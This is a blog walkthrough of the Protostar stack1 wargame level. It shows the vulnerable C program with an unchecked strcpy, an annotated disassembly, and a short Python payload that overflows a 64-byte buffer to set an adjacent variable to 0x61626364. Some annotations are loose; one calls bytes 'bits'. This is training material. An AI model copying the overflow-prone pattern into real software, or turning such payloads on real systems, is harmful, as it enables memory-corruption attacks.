Binary Exploitation Protostar Stack1 - Walkthrough -Writeup

Hello Guyz,




In This Post, I am going to show you how we can win protostar stack1 level and in today's tutorial, our main focus will be on variable overwriting. we are going to learn a simple concept/technique that can overwrite the values of any variable Onto Stack during running state.

Before Starting This Walkthrough. I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.


Source Code :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}




Hint Provided By Exploit-Exercise.

This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.

This level is at /opt/protostar/bin/stack1

If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your friend.
Protostar is little endian

Solution:

Simply We Just Need To Overwrite the value of modified variable located Onto the Stack.
Before Start, Let's Try To Understand Situation Onto The Stack


0                        28                                                      92        96
 ============================================================================================
        Other Things     |  Injectable Area                                      | modified | 
 ============================================================================================


Disassembly Of Codes

   0x08048464 <+0>: push   ebp
   0x08048465 <+1>: mov    ebp,esp
   0x08048467 <+3>: and    esp,0xfffffff0
   0x0804846a <+6>: sub    esp,0x60                  << ====== 96 Bits Buffer Created
   0x0804846d <+9>: cmp    DWORD PTR [ebp+0x8],0x1   << ====== Comparing Args Variable with 1
   0x08048471 <+13>: jne    0x8048487 <main+35>   << ====== Jump Condition
   0x08048473 <+15>: mov    DWORD PTR [esp+0x4],0x80485a0 
   0x0804847b <+23>: mov    DWORD PTR [esp],0x1
   0x08048482 <+30>: call   0x8048388 <errx@plt>
   0x08048487 <+35>: mov    DWORD PTR [esp+0x5c],0x0  << ===== Variable Value [modified variable]
   0x0804848f <+43>: mov    eax,DWORD PTR [ebp+0xc]   << ===== BUffer Starting Address To Insert String Through Strcpy
   0x08048492 <+46>: add    eax,0x4                  << ===== Add 4 To EAX
   0x08048495 <+49>: mov    eax,DWORD PTR [eax]      << ===== Loading Data From EAX mapped  
   0x08048497 <+51>: mov    DWORD PTR [esp+0x4],eax  << ===== Storing Current EAX Value Into Stack 
   0x0804849b <+55>: lea    eax,[esp+0x1c]           << ===== Starting POint Address To Insert Data Into Stack Buffer
   0x0804849f <+59>: mov    DWORD PTR [esp],eax        
   0x080484a2 <+62>: call   0x8048368 <strcpy@plt>
   0x080484a7 <+67>: mov    eax,DWORD PTR [esp+0x5c]
   0x080484ab <+71>: cmp    eax,0x61626364
   0x080484b0 <+76>: jne    0x80484c0 <main+92>
   0x080484b2 <+78>: mov    DWORD PTR [esp],0x80485bc
   0x080484b9 <+85>: call   0x8048398 <puts@plt>
   0x080484be <+90>: jmp    0x80484d5 <main+113>
   0x080484c0 <+92>: mov    edx,DWORD PTR [esp+0x5c]
   0x080484c4 <+96>: mov    eax,0x80485f3
   0x080484c9 <+101>: mov    DWORD PTR [esp+0x4],edx
   0x080484cd <+105>: mov    DWORD PTR [esp],eax
   0x080484d0 <+108>: call   0x8048378 <printf@plt>
   0x080484d5 <+113>: leave  
   0x080484d6 <+114>: ret    



Exploit

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
#!/usr/bin/python
# -*- coding:utf-8 -*-
import struct

# Usages :  ./bin/stack1 $(cat tmp)

payload = "a"*64
payload+= struct.pack("I", 0x61626364)


print payload



Very Easy! Hahaha.


For More Detailed Walk through Check Below Provided YouTube Video Playlist



Share this

Related Posts

Previous
Next Post »